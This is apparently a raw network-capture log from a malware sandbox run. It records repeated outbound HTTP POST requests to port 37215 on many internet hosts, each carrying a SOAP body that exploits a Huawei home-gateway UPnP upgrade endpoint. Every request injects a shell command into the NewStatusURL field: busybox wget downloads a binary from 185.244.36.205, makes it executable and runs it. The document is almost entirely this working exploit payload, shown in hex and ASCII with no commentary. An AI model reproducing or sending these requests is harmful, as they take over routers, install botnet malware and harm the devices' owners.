                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              30192.168.2.1540440197.81.136.9937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033358097 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              31192.168.2.1532804121.72.232.3137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033360004 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              32192.168.2.1554054186.204.27.24637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033368111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              33192.168.2.1542190181.96.242.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033418894 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              34192.168.2.153622435.30.174.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033464909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              35192.168.2.1538592122.249.153.8737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033467054 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              36192.168.2.153959487.249.177.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033524990 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              37192.168.2.1555434121.247.31.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033524990 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              38192.168.2.155606494.211.9.18837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033524990 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              39192.168.2.154996494.55.21.11237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033526897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
